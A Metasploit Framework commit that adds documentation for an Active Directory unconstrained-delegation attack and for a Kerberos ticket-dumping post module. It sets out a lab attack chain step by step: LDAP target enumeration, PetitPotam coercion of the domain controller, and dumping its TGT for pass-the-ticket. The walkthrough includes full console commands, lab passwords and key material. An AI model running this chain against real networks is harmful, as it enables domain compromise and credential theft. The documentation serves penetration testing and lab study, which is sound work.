dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add module docs

This commit is contained in:
Spencer McIntyre 2023-08-23 08:43:55 -04:00
parent b44bf1ce7e
commit 54bce7fcb5
5 changed files with 640 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
data/auxiliary/gather/ldap_query/ldap_queries_default.yaml
View File

@ -292,7 +292,7 @@ queries:
references:
- http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
- action: ENUM_UNCONSTRAINED_DELEGATION
description: 'Dump info about all known objects that allow uncontrained delegation.'
description: 'Dump info about all known objects that allow unconstrained delegation.'
filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
attributes:
- cn

226
docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md Normal file
View File

@ -0,0 +1,226 @@
# Unconstrained Delegation Exploitation
If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then
the attacker can leverage it to compromise the Active Directory domain.
## Lab setup
For this attack to work there must be a computer account (workstation or server) in the active directory domain that has
been configured for unconstrained delegation.
On the domain controller:
1. Open "Active Directory Users and Computers"
2. Navigate to the computer account, right click and select "Properties"
3. In the "Delegation" tab, select "Trust this computer for delegation to any service (Kerberos only)"
On the target computer:
1. Force an update of group policy by running `gpupdate /force`
2. Reboot the computer
## Attack Workflow
This attack assumes that the attacker has:
1. The IP address of the domain controller.
2. The active directory domain name.
3. A compromised domain account (no special privileges are necessary).
4. The ability to fully compromise a target system through some means.
5. (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used.
Verify this using `db_status` command.
At a high-level the summary to leverage this attack chain is:
1. Identify a target computer account configured with unconstrained delegation.
2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).
3. Coerce authentication to the compromised target from a domain controller.
4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.
5. Use the TGT to authenticate to the domain controller as itself (the computer account).
### Target Identification
The unconstrained delegation setting is stored as a bit flag in the `userAccountControl` LDAP attribute. A domain
account can be used with the `auxiliary/gather/ldap_query` module to identify computer accounts configured for
unconstrained delegation. Note that by default domain controllers themselves are configured for unconstrained delegation
and should be ignored as targets.
Use the `ENUM_UNCONSTRAINED_DELEGATION` action to enumerate targets:
```
msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(gather/ldap_query) > set DOMAIN msflab.local
DOMAIN => msflab.local
msf6 auxiliary(gather/ldap_query) > set USERNAME aliddle
USERNAME => aliddle
msf6 auxiliary(gather/ldap_query) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_UNCONSTRAINED_DELEGATION
ACTION => ENUM_UNCONSTRAINED_DELEGATION
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 192.168.159.10
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
CN=WS01 CN=Computers DC=msflab DC=local
=======================================
Name Attributes
---- ----------
cn WS01
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
samaccountname WS01$
CN=DC OU=Domain Controllers DC=msflab DC=local
==============================================
Name Attributes
---- ----------
cn DC
memberof CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=msflab,DC=local || CN=Cert Publishers,CN=Users,DC=msflab,DC=local
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=msflab,DC=local
samaccountname DC$
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_query) >
```
This results in two potential targets, WS01 and DC. Next, use the `ENUM_DOMAIN_CONTROLLERS` action to identify the
domain controllers to remove from the list of potential targets.
```
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN_CONTROLLERS
ACTION => ENUM_DOMAIN_CONTROLLERS
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 192.168.159.10
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
[+] 192.168.159.10:389 Discovered schema DN: DC=msflab,DC=local
CN=DC OU=Domain Controllers DC=msflab DC=local
==============================================
Name Attributes
---- ----------
distinguishedname CN=DC,OU=Domain Controllers,DC=msflab,DC=local
dnshostname DC.msflab.local
name DC
operatingsystem Windows Server 2019 Standard
operatingsystemversion 10.0 (17763)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_query) >
```
This show that DC is a domain controller and should be removed from the list, leaving WS01 as the only viable target.
### Exploitation
Now the WS01 system needs to be compromised through some means to obtain a Meterpreter session. Once a Meterpreter
session has been obtained, the Domain Controller needs to be coerced into authenticating to the target. The
`auxiliary/scanner/dcerpc/petitpotam` module can be used for this purpose. Use the module, and take care to set the
`LISTENER` option to **the hostname of the compromised host**. The hostname must be used and not an IP address. Set the
remaining options including `RHOSTS` to the domain controller, and `SMBUser` / `SMBPass` to the credentials of the
compromised domain account.
```
msf6 > use auxiliary/scanner/dcerpc/petitpotam
msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER ws01.msflab.local
LISTENER => ws01.msflab.local
msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(scanner/dcerpc/petitpotam) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[+] 192.168.159.10:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```
If the module does not indicate that the attack was successful, another tool like
[`Coercer`](https://github.com/p0dalirius/Coercer) can be used to try additional methods.
Now that the domain controller has authenticated to the target it's necessary to dump the kerberos tickets from the
compromised target. Use the `post/windows/manage/kerberos_tickets` module and the `DUMP_TICKETS` action to dump the TGTs
from the compromised host. If the attack was successful there should be at least one TGT from the domain controller's
computer account.
```
msf6 > use post/windows/manage/kerberos_tickets
msf6 post(windows/manage/kerberos_tickets) > set SESSION -1
SESSION => -1
msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
SERVICE => krbtgt/*
msf6 post(windows/manage/kerberos_tickets) > run
[*] LSA Handle: 0x000001efe1c415a0
[*] LogonSession LUID: 0x00004bc1d
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:33:17 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823151727_default_192.168.159.10_mit.kerberos.cca_488233.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:17 -0400
End time: 2023-08-23 18:33:17 -0400
Renew Till: 2023-08-30 08:33:17 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
[*] LogonSession LUID: 0x00001052b
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:38 -0400
... omitted for brevity ...
```
In this case, a TGT for the `MSFLAB\DC$` account was obtained through the logon session with LUID `0x00004bc1d`. The
ticket was stored to disk in a ccache file. The ticket can also be seen in the output of `klist`.
```
msf6 post(windows/manage/kerberos_tickets) > klist
Kerberos Cache
==============
id host principal sname issued status path
-- ---- --------- ----- ------ ------ ----
411 192.168.159.10 DC$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 09:32:46 -0400 active /home/smcintyre/.msf4/loot/20230823151744_default_192.168.159.10_mit.kerberos.cca_307418.bin
407 192.168.159.10 WS01$@MSFLAB.LOCAL krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL 2023-08-23 15:14:46 -0400 active /home/smcintyre/.msf4/loot/20230823151735_default_192.168.159.10_mit.kerberos.cca_760842.bin
msf6 post(windows/manage/kerberos_tickets) >
```
### Using The Ticket
Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby
the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to
use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain
controller.

6
docs/navigation.rb
View File

@ -186,7 +186,11 @@ NAVIGATION_CONFIG = [
},
{
path: '../../documentation/modules/auxiliary/admin/ldap/rbcd.md',
title: 'RBCD - Resource-based constrained delegation'
title: 'Resource-based constrained delegation (RBCD)'
},
{
path: 'kerberos/unconstrained_delegation.md',
title: 'Unconstrained delegation'
}
]
},

405
documentation/modules/post/windows/manage/kerberos_tickets.md Normal file
View File

@ -0,0 +1,405 @@
Manage kerberos tickets on a compromised host. Different actions are available for different tasks. Kerberos tickets are
associated with logon sessions which can be enumerated with the `ENUM_LUIDS` action. s
## Options
### LUID
An optional logon session LUID to target in the DUMP_TICKETS and SHOW_LUID actions. The LUID is expressed in hex, e.g.
`0x11223344`.
### SERVICE
An optional service name wildcard to target in the DUMP_TICKETS action. This option accepts wild cards. For example, to
dump only TGTs use `krbtgt/*` and to only dump tickets for dc.msflab.local, use `*/dc.msflab.local`. Wildcards and
service names are case insensitive.
## Actions
### DUMP_TICKETS
This action allows dumping kerberos tickets from a compromised host. These tickets are loaded into Metasploit's
kerberos ticket cache when Metasploit is connected to a database. If the Meterpreter session is running with
administrative privileges, then the tickets from all logon sessions can be dumped. If the Meterpreter session is not
running with Administrative privileges then only the tickets from the current logon session / current user can be
dumped. If the `LUID` option is set then only the tickets from that logon session will be dumped. Targeting a specific
LUID with the `LUID` option requires administrative privileges.
### ENUM_LUIDS
This action will enumerate the LUIDs of all active logon sessions. Some basic information is printed for each LUID.
### SHOW_LUID
This action will show the LUID and some basic information about the current logon session unless the `LUID` option is
set in which case that logon session is shown.
## Scenarios
In this case the operator lists the currently cached Kerberos tickets in the Metasploit database. After that the
`DUMP_TICKETS` action is used with a service filter to dump the TGTs on the compromised host. Finally, the `klist`
command is used again to show the newly added TGTs.
```
msf6 post(windows/manage/kerberos_tickets) > klist
Kerberos Cache
==============
No tickets
msf6 post(windows/manage/kerberos_tickets) > run SESSION=-1 SERVICE=krbtgt/*
[*] LSA Handle: 0x000001efe1bf7270
[*] LogonSession LUID: 0x00004bc1d
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:33:17 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:17 -0400
End time: 2023-08-23 18:33:17 -0400
Renew Till: 2023-08-30 08:33:17 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
[*] LogonSession LUID: 0x00001052b
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:38 -0400
[*] LogonSession LUID: 0x00000aa83
[*] User: \
[*] Session: 0
[*] AuthenticationPackage: NTLM
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-08-23 08:32:27 -0400
[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated.
[*] LogonSession LUID: 0x0000ae359
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:38:08 -0400
[*] LogonSession LUID: 0x0000ae2d3
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:38:08 -0400
[*] LogonSession LUID: 0x00004fff8
[*] User: MSFLAB\smcintyre
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:33:18 -0400
[*] LogonSession LUID: 0x00004b823
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:33:17 -0400
[*] LogonSession LUID: 0x00000b7c4
[*] User: Font Driver Host\UMFD-0
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:37 -0400
[*] LogonSession LUID: 0x0001f3e4f
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 09:42:34 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: e515137250f072d44b7487c09b8033a34ff1c7e96ad20674007c255a0a8de2b0
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x60a10000 (FORWARDABLE, FORWARDED, RENEWABLE, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:17 -0400
End time: 2023-08-23 18:33:17 -0400
Renew Till: 2023-08-30 08:33:17 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
L/csyZle+LDn1i7Yqci0vbZCHrjO8CeQXBSix3d1lCR66sR0Zq/ogR/6g3X8yGn9acvGjAtt29ZErQe4FA3ttZ6MA2p8QldvbQCvELLpQkOHKrmzd2YhWy5YxfbwzFpZT0OtFEB0gYW3AQuOyRKk5vCuljZH6bPaz77g8KUejFx80tJbmz6n2GLOzG8rcMiy/i/zYreG6TLnjZJgw3UVABFSjUKs20eSK2Le5OxSKfcBQTwaRp+BPdXWGbMNYWwTUntAZGC5G6DE9xglY0+T2D/9HFSWVesrnduMmzHR9NojQYezHJorMKh7m5/KeNEzuJUDLCkgX/Uscq8dc6XMaFH7aIsg5+nlAZBPTrYtkayun6AaTLJpqLg90ab3iYCZpvdCBKBPapg3271YVHe8i7OaDDJWXMNooi+6Jg+B1cnBRH9qQ5T2k7RQLMNez9P8dvuMkDmFpRz5KOJk+w+Mz6XFeu9g1Z4zXQ6msI060PrwvAENevTN9DKUWtDGBCQMTjBDm75sMA7Aq8KgBqKYUhP+CV+HzgFou4P1/t3l+udRBIYfQw68EHW2dQE/ZZR+oLPPHbCsbnpkp/rSFjdsl0E9Zm4upPty3M+sKd2fdZSLXs5CLBs5WeZmPrXHrHnyC/AnoLNQVTVCtv5EpM50BWooXWKHljLctHxN/W6ZXgqwZ4R7KNYIrtaAsmLrkq2K/z+zsuAWRoDKFtLWZMD9eqfsGi2bRBqPf74+mi1bPXL/1eWlUwmrjr5Buj4kvC8XB+wTRoAkSrjoAx7IglfSIKdW/5N3CX6G+smJWZCsrGIvouTzIzcpHCXgoaHypnm2B9G7yIwkDgpCFd4MW3t8ZrZXOjuReQ6Aiy9mXHlbReX9G3Xl0fj7z4cIKSV4YiyEkjXJE+eAT7GdtJEPFXJJw6Fxhdam+FL+SKVvu4kw+uvqfz72GDG24/KqM3/0L58M96oEd1LHnVoHwuPtfDA7xhvHDu8iYZOkOjDc5cwMCU0MmW5A1cijTuNfSeRRHx6xXLPKkIJH/5XWeg7BAG3lnlOgS/HKj+Uhti7fabZHUvXyGAdA7CJzZ2OUlZY6Acm9JU2EuUfFvnpEjAtasckDA43pb/r4ZNIZPxcq6gpgcdFpZIb8H7bbWdIIinDJfFkEunJ7E1TG9wSbX6j6JfThG31L7EBW+UPHlDa4k1wPFMP3lNgleVUBi0n24T1RBTb6c5W0Cw==
[*] LogonSession LUID: 0x0001243b3
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:47:47 -0400
[*] LogonSession LUID: 0x0000003e5
[*] User: NT AUTHORITY\LOCAL SERVICE
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-08-23 08:32:38 -0400
[*] LogonSession LUID: 0x0000ae390
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:38:08 -0400
[*] LogonSession LUID: 0x0000ae320
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Kerberos
[*] LogonType: Network (3)
[*] LogonTime: 2023-08-23 08:38:08 -0400
[*] LogonSession LUID: 0x00000b7be
[*] User: Font Driver Host\UMFD-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:37 -0400
[*] LogonSession LUID: 0x00000b76e
[*] User: Font Driver Host\UMFD-0
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:37 -0400
[*] LogonSession LUID: 0x0000104e9
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:38 -0400
[*] LogonSession LUID: 0x00000b77b
[*] User: Font Driver Host\UMFD-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-08-23 08:32:37 -0400
[*] LogonSession LUID: 0x0000003e7
[*] User: MSFLAB\DC$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-08-23 08:32:26 -0400
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:17 -0400
End time: 2023-08-23 18:33:17 -0400
Renew Till: 2023-08-30 08:33:17 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
[*] Ticket[1]
[*] TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
Primary Principal: DC$@MSFLAB.LOCAL
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
Client: DC$@MSFLAB.LOCAL
Ticket etype: 18 (AES256)
Key: 810290bb8e930190000e05de7abee1f095bfe29527cca5ad9320cf3d86260f08
Subkey: false
Ticket Length: 1006
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 19:00:00 -0500
Start time: 2023-08-23 08:33:17 -0400
End time: 2023-08-23 18:33:17 -0400
Renew Till: 2023-08-30 08:33:17 -0400
Ticket:
Ticket Version Number: 5
Realm: MSFLAB.LOCAL
Server Name: krbtgt/MSFLAB.LOCAL
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
